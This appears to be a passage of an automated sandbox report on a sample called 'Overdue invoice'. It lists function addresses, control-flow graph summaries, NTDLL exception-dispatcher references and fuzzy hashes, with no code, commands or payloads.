                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: a513491f23dd7650423f95719837a44d56ea5f89338d91be69ab3f7cfe482d5b
                                                                          • Instruction ID: 1ce3e7b571fe4b49dad41ab584309963d754d439fef0349693cc909b52cfe191
                                                                          • Opcode Fuzzy Hash: a513491f23dd7650423f95719837a44d56ea5f89338d91be69ab3f7cfe482d5b
                                                                          • Instruction Fuzzy Hash: E9020B39902398CFCB65DF20D8886A9B7B2FF4571AF6041EAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7461 Relevance: 3.3, APIs: 2, Instructions: 347COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 221 64e7461-64e7487 382 64e7487 call 6c66bf0 221->382 383 64e7487 call 6c66c9e 221->383 225 64e748d-64e7515 365 64e7515 call 6c68ea3 225->365 366 64e7515 call 6c68f00 225->366 367 64e7515 call 6c68f5f 225->367 368 64e7515 call 6c68efb 225->368 369 64e7515 call 6c68e0b 225->369 231 64e751b-64e759a 370 64e759a call 6c6914b 231->370 371 64e759a call 6c69158 231->371 237 64e75a0-64e7628 372 64e7628 call 6c69657 237->372 373 64e7628 call 6c69660 237->373 243 64e762e-64e766f 374 64e766f call 6c69823 243->374 375 64e766f call 6c69828 243->375 246 64e7675-64e76b6 376 64e76b6 call 6c6a423 246->376 377 64e76b6 call 6c6a430 246->377 378 64e76b6 call 6c6a42b 246->378 249 64e76bc-64e76fd 379 64e76fd call 6c6a860 249->379 380 64e76fd call 6c6a85b 249->380 381 64e76fd call 6c6a8e9 249->381 252 64e7703-64e816e KiUserExceptionDispatcher * 2 363 64e8175-64e81ad 252->363 365->231 366->231 367->231 368->231 369->231 370->237 371->237 372->243 373->243 374->246 375->246 376->249 377->249 378->249 379->252 380->252 381->252 382->225 383->225
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 717d5e0e8fa56d3f9c90228b54d76a09d84458f26e867eab00b537a55c5afad5
                                                                          • Instruction ID: edc705339c6de9102205074522ea5a851df8ebaf2d141fcdfb7e750568efd36d
                                                                          • Opcode Fuzzy Hash: 717d5e0e8fa56d3f9c90228b54d76a09d84458f26e867eab00b537a55c5afad5
                                                                          • Instruction Fuzzy Hash: 9F020B39902258CFDB65DF20D8886A9B7B2FF4570AF6041EAE90A57340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E74A8 Relevance: 3.3, APIs: 2, Instructions: 340COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 384 64e74a8-64e7515 525 64e7515 call 6c68ea3 384->525 526 64e7515 call 6c68f00 384->526 527 64e7515 call 6c68f5f 384->527 528 64e7515 call 6c68efb 384->528 529 64e7515 call 6c68e0b 384->529 391 64e751b-64e759a 530 64e759a call 6c6914b 391->530 531 64e759a call 6c69158 391->531 397 64e75a0-64e7628 532 64e7628 call 6c69657 397->532 533 64e7628 call 6c69660 397->533 403 64e762e-64e766f 534 64e766f call 6c69823 403->534 535 64e766f call 6c69828 403->535 406 64e7675-64e76b6 536 64e76b6 call 6c6a423 406->536 537 64e76b6 call 6c6a430 406->537 538 64e76b6 call 6c6a42b 406->538 409 64e76bc-64e76fd 539 64e76fd call 6c6a860 409->539 540 64e76fd call 6c6a85b 409->540 541 64e76fd call 6c6a8e9 409->541 412 64e7703-64e816e KiUserExceptionDispatcher * 2 523 64e8175-64e81ad 412->523 525->391 526->391 527->391 528->391 529->391 530->397 531->397 532->403 533->403 534->406 535->406 536->409 537->409 538->409 539->412 540->412 541->412
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 72defcb839cbb1e6dd4b2fae1b49c49245f9014c33208b49eae7a51ab3eb6c31
                                                                          • Instruction ID: 2bcb68187d79025374ad451ea2a005353719e519735498074fb453c4608b4619
                                                                          • Opcode Fuzzy Hash: 72defcb839cbb1e6dd4b2fae1b49c49245f9014c33208b49eae7a51ab3eb6c31
                                                                          • Instruction Fuzzy Hash: 5B021B39902398CFCB65DF20D8886A9B7B2FF4571AF6041EAE90A57340DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E74EF Relevance: 3.3, APIs: 2, Instructions: 333COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 542 64e74ef-64e7515 690 64e7515 call 6c68ea3 542->690 691 64e7515 call 6c68f00 542->691 692 64e7515 call 6c68f5f 542->692 693 64e7515 call 6c68efb 542->693 694 64e7515 call 6c68e0b 542->694 546 64e751b-64e759a 695 64e759a call 6c6914b 546->695 696 64e759a call 6c69158 546->696 552 64e75a0-64e7628 680 64e7628 call 6c69657 552->680 681 64e7628 call 6c69660 552->681 558 64e762e-64e766f 682 64e766f call 6c69823 558->682 683 64e766f call 6c69828 558->683 561 64e7675-64e76b6 684 64e76b6 call 6c6a423 561->684 685 64e76b6 call 6c6a430 561->685 686 64e76b6 call 6c6a42b 561->686 564 64e76bc-64e76fd 687 64e76fd call 6c6a860 564->687 688 64e76fd call 6c6a85b 564->688 689 64e76fd call 6c6a8e9 564->689 567 64e7703-64e816e KiUserExceptionDispatcher * 2 678 64e8175-64e81ad 567->678 680->558 681->558 682->561 683->561 684->564 685->564 686->564 687->567 688->567 689->567 690->546 691->546 692->546 693->546 694->546 695->552 696->552
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 9d7dd3a93a1b03cf1b2134357489961e29b07c2df88386aa4d112b802d0cdcae
                                                                          • Instruction ID: f506ed393bf345b1cf2802633fa948518424e4e68be9abc3f637fc56a28b1652
                                                                          • Opcode Fuzzy Hash: 9d7dd3a93a1b03cf1b2134357489961e29b07c2df88386aa4d112b802d0cdcae
                                                                          • Instruction Fuzzy Hash: E2021B39902298CFCB65DF20D8886A9B7B2FF4571AF6041DAE90A57340DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7536 Relevance: 3.3, APIs: 2, Instructions: 326COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 697 64e7536-64e759a 838 64e759a call 6c6914b 697->838 839 64e759a call 6c69158 697->839 704 64e75a0-64e7628 840 64e7628 call 6c69657 704->840 841 64e7628 call 6c69660 704->841 710 64e762e-64e766f 842 64e766f call 6c69823 710->842 843 64e766f call 6c69828 710->843 713 64e7675-64e76b6 832 64e76b6 call 6c6a423 713->832 833 64e76b6 call 6c6a430 713->833 834 64e76b6 call 6c6a42b 713->834 716 64e76bc-64e76fd 835 64e76fd call 6c6a860 716->835 836 64e76fd call 6c6a85b 716->836 837 64e76fd call 6c6a8e9 716->837 719 64e7703-64e816e KiUserExceptionDispatcher * 2 830 64e8175-64e81ad 719->830 832->716 833->716 834->716 835->719 836->719 837->719 838->704 839->704 840->710 841->710 842->713 843->713
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 8d32e7cc3ac7796b49458261dbb8b89af9e09d76afdd3720c36f1ad5029c12dd
                                                                          • Instruction ID: 4ec01f91180293eacd3b5b9d65a307a97fc62089af07c5554ac9cbab52b1489d
                                                                          • Opcode Fuzzy Hash: 8d32e7cc3ac7796b49458261dbb8b89af9e09d76afdd3720c36f1ad5029c12dd
                                                                          • Instruction Fuzzy Hash: E8021B39902398CFCB65DF20D8886A9B7B2FF4971AF6041DAE90A57340DB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E757D Relevance: 3.3, APIs: 2, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 844 64e757d-64e759a 986 64e759a call 6c6914b 844->986 987 64e759a call 6c69158 844->987 848 64e75a0-64e7628 976 64e7628 call 6c69657 848->976 977 64e7628 call 6c69660 848->977 854 64e762e-64e766f 978 64e766f call 6c69823 854->978 979 64e766f call 6c69828 854->979 857 64e7675-64e76b6 980 64e76b6 call 6c6a423 857->980 981 64e76b6 call 6c6a430 857->981 982 64e76b6 call 6c6a42b 857->982 860 64e76bc-64e76fd 983 64e76fd call 6c6a860 860->983 984 64e76fd call 6c6a85b 860->984 985 64e76fd call 6c6a8e9 860->985 863 64e7703-64e816e KiUserExceptionDispatcher * 2 974 64e8175-64e81ad 863->974 976->854 977->854 978->857 979->857 980->860 981->860 982->860 983->863 984->863 985->863 986->848 987->848
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 253a5ebd94a607d5ce275403ebc1ae3c0cf7dd09dc6eb59277f969de3f5008f0
                                                                          • Instruction ID: f8491e5c3d1622c4a44e8b99b7ed99997e6064911ae83d3f7c3759b86d032306
                                                                          • Opcode Fuzzy Hash: 253a5ebd94a607d5ce275403ebc1ae3c0cf7dd09dc6eb59277f969de3f5008f0
                                                                          • Instruction Fuzzy Hash: D9F10A39902398CFCB65DF20D8886A9B7B2FF4571AF6041DAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E75BB Relevance: 3.3, APIs: 2, Instructions: 312COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 988 64e75bb-64e7628 1125 64e7628 call 6c69657 988->1125 1126 64e7628 call 6c69660 988->1126 995 64e762e-64e766f 1117 64e766f call 6c69823 995->1117 1118 64e766f call 6c69828 995->1118 998 64e7675-64e76b6 1119 64e76b6 call 6c6a423 998->1119 1120 64e76b6 call 6c6a430 998->1120 1121 64e76b6 call 6c6a42b 998->1121 1001 64e76bc-64e76fd 1122 64e76fd call 6c6a860 1001->1122 1123 64e76fd call 6c6a85b 1001->1123 1124 64e76fd call 6c6a8e9 1001->1124 1004 64e7703-64e816e KiUserExceptionDispatcher * 2 1115 64e8175-64e81ad 1004->1115 1117->998 1118->998 1119->1001 1120->1001 1121->1001 1122->1004 1123->1004 1124->1004 1125->995 1126->995
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 5eed9d894212c565d9c02e3fb4f975b3dcab15457769a1d41595818e8432a7b2
                                                                          • Instruction ID: fcac7ade2c900a65d0bfc76b4057b2c3d9ae1737bdb89067e498df0e0e7d2499
                                                                          • Opcode Fuzzy Hash: 5eed9d894212c565d9c02e3fb4f975b3dcab15457769a1d41595818e8432a7b2
                                                                          • Instruction Fuzzy Hash: B4F1FB39902398CFCBA5DF20D8886A9B7B2FF4571AF6041DAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7602 Relevance: 3.3, APIs: 2, Instructions: 305COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1127 64e7602-64e7628 1253 64e7628 call 6c69657 1127->1253 1254 64e7628 call 6c69660 1127->1254 1131 64e762e-64e766f 1255 64e766f call 6c69823 1131->1255 1256 64e766f call 6c69828 1131->1256 1134 64e7675-64e76b6 1257 64e76b6 call 6c6a423 1134->1257 1258 64e76b6 call 6c6a430 1134->1258 1259 64e76b6 call 6c6a42b 1134->1259 1137 64e76bc-64e76fd 1260 64e76fd call 6c6a860 1137->1260 1261 64e76fd call 6c6a85b 1137->1261 1262 64e76fd call 6c6a8e9 1137->1262 1140 64e7703-64e816e KiUserExceptionDispatcher * 2 1251 64e8175-64e81ad 1140->1251 1253->1131 1254->1131 1255->1134 1256->1134 1257->1137 1258->1137 1259->1137 1260->1140 1261->1140 1262->1140
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 3d49211392786cd5029f2ec97f007066519fa967531754f90ca4acda0629f0b7
                                                                          • Instruction ID: 980577548e42bad3136959c0301e3c4280bc32d92b1874fde320806a1fdb3e13
                                                                          • Opcode Fuzzy Hash: 3d49211392786cd5029f2ec97f007066519fa967531754f90ca4acda0629f0b7
                                                                          • Instruction Fuzzy Hash: B0F1FA39902398CFCB65DF20D8886A9B7B2FF4571AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7649 Relevance: 3.3, APIs: 2, Instructions: 298COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1263 64e7649-64e766f 1386 64e766f call 6c69823 1263->1386 1387 64e766f call 6c69828 1263->1387 1267 64e7675-64e76b6 1388 64e76b6 call 6c6a423 1267->1388 1389 64e76b6 call 6c6a430 1267->1389 1390 64e76b6 call 6c6a42b 1267->1390 1270 64e76bc-64e76fd 1391 64e76fd call 6c6a860 1270->1391 1392 64e76fd call 6c6a85b 1270->1392 1393 64e76fd call 6c6a8e9 1270->1393 1273 64e7703-64e816e KiUserExceptionDispatcher * 2 1384 64e8175-64e81ad 1273->1384 1386->1267 1387->1267 1388->1270 1389->1270 1390->1270 1391->1273 1392->1273 1393->1273
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: ddba0dc1bed6548713104a301eef06f867f8e5dbcf5d9d4efbe1a224ed35e710
                                                                          • Instruction ID: 1c7a2e72541b397efb9e7cf44dbe78a89f8da877d4c86ccc7e5b577ad4434bc6
                                                                          • Opcode Fuzzy Hash: ddba0dc1bed6548713104a301eef06f867f8e5dbcf5d9d4efbe1a224ed35e710
                                                                          • Instruction Fuzzy Hash: CAF1FC39902398CFCB65DF20D8886A9B7B2FF4971AF6041DAE90A57340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7690 Relevance: 3.3, APIs: 2, Instructions: 291COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1394 64e7690-64e76b6 1514 64e76b6 call 6c6a423 1394->1514 1515 64e76b6 call 6c6a430 1394->1515 1516 64e76b6 call 6c6a42b 1394->1516 1398 64e76bc-64e76fd 1517 64e76fd call 6c6a860 1398->1517 1518 64e76fd call 6c6a85b 1398->1518 1519 64e76fd call 6c6a8e9 1398->1519 1401 64e7703-64e816e KiUserExceptionDispatcher * 2 1512 64e8175-64e81ad 1401->1512 1514->1398 1515->1398 1516->1398 1517->1401 1518->1401 1519->1401
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: cccf28d805b4df09f0ace98b8b5f8d05279e52646eef8887ffa22dfa6ce842b9
                                                                          • Instruction ID: 4e34e1521c7207b593c0fb9ed1aff4faf5dad019e4b2886708aaa8a23e5bcca2
                                                                          • Opcode Fuzzy Hash: cccf28d805b4df09f0ace98b8b5f8d05279e52646eef8887ffa22dfa6ce842b9
                                                                          • Instruction Fuzzy Hash: 58E10C39902258CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E76D7 Relevance: 3.3, APIs: 2, Instructions: 284COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1520 64e76d7-64e76fd 1637 64e76fd call 6c6a860 1520->1637 1638 64e76fd call 6c6a85b 1520->1638 1639 64e76fd call 6c6a8e9 1520->1639 1524 64e7703-64e816e KiUserExceptionDispatcher * 2 1635 64e8175-64e81ad 1524->1635 1637->1524 1638->1524 1639->1524
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 58e640a81e6365525f6846f96f200549b007b8c84a99b1b48256735183378354
                                                                          • Instruction ID: a2fce6930553036865b3ed870997d5e6b22c5f35af9f3a6abfe1d23d70920588
                                                                          • Opcode Fuzzy Hash: 58e640a81e6365525f6846f96f200549b007b8c84a99b1b48256735183378354
                                                                          • Instruction Fuzzy Hash: EEE10B39902258CFDB65EF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E771E Relevance: 3.3, APIs: 2, Instructions: 277COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1640 64e771e-64e816e KiUserExceptionDispatcher * 2 1752 64e8175-64e81ad 1640->1752
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 94b7a5d89200d1e6337211c0b15dc71649bdecb44ac95c7a67fe860710dcae32
                                                                          • Instruction ID: 227957513b88d326094dcf1c6755bcd95367fc68d49b2ae6d975a89d7d34cc50
                                                                          • Opcode Fuzzy Hash: 94b7a5d89200d1e6337211c0b15dc71649bdecb44ac95c7a67fe860710dcae32
                                                                          • Instruction Fuzzy Hash: 6FE10C39902298CFDB65DF30D8886A9B7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7765 Relevance: 3.3, APIs: 2, Instructions: 270COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1754 64e7765-64e816e KiUserExceptionDispatcher * 2 1863 64e8175-64e81ad 1754->1863
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 233b6714286a54466dcb8c9f768e2551e8dc68f833c32db7c5cb47e8641e5334
                                                                          • Instruction ID: 6d4f12a3d09317d28948627dfd25e739338189ca7d5fb2ee0764f521730c81a5
                                                                          • Opcode Fuzzy Hash: 233b6714286a54466dcb8c9f768e2551e8dc68f833c32db7c5cb47e8641e5334
                                                                          • Instruction Fuzzy Hash: 00E1FB39902298CFDB65DF20D8886A9B7B2FF4970AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E77AC Relevance: 3.3, APIs: 2, Instructions: 263COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1865 64e77ac-64e816e KiUserExceptionDispatcher * 2 1971 64e8175-64e81ad 1865->1971
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 0d82aad5ee31bae57f18fd1acfaef25b62f8b86ae6db704105311723dabd72ed
                                                                          • Instruction ID: bacb8747aa4c12b34e16632d8ca33059c63c52b0b68ae9f9a8bc3c97a18b7b9a
                                                                          • Opcode Fuzzy Hash: 0d82aad5ee31bae57f18fd1acfaef25b62f8b86ae6db704105311723dabd72ed
                                                                          • Instruction Fuzzy Hash: 13D10C39902298CFCB65DF20D8886ADB7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E77F3 Relevance: 3.3, APIs: 2, Instructions: 256COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E7819
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 6b2809b979890f6d276db787e23b89d3b21b89907c3ad4bf07e24f568f6e8276
                                                                          • Instruction ID: 77a9bac5f0102794e07cc72f2ce593fbe42ebe03d7005126812afbf659d8bf46
                                                                          • Opcode Fuzzy Hash: 6b2809b979890f6d276db787e23b89d3b21b89907c3ad4bf07e24f568f6e8276
                                                                          • Instruction Fuzzy Hash: 6FD10B39902298CFCB65DF20D8886ADB7B2FF4570AF6041DAE90A67340DB355E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7850 Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 374b16abdf81bcb1bafcc8e17c2fad583d6a9feb9c3ea4907eb9ef4509e6ef3a
                                                                          • Instruction ID: 2e601372d2c99577ce41dc22162f98ad5ab51d57ab48c9f8d04b03b5edbd2b54
                                                                          • Opcode Fuzzy Hash: 374b16abdf81bcb1bafcc8e17c2fad583d6a9feb9c3ea4907eb9ef4509e6ef3a
                                                                          • Instruction Fuzzy Hash: 53D1EA39902298CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 064E7897 Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 064E8156
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526519437.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_64e0000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 2fdf3479ddc1aa93a425bb6cda61b6ba44cb51e381448e46df65cb3343ef2cc3
                                                                          • Instruction ID: 4a01b0d8ae44eaaaef0e84c920bd4ce8f83f0576c92839e92da120488c632ebb
                                                                          • Opcode Fuzzy Hash: 2fdf3479ddc1aa93a425bb6cda61b6ba44cb51e381448e46df65cb3343ef2cc3
                                                                          • Instruction Fuzzy Hash: 18C1EA39902398CFDB65DF20D8886A9B7B2FF4570AF6041DAE90A67340DB355E82CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

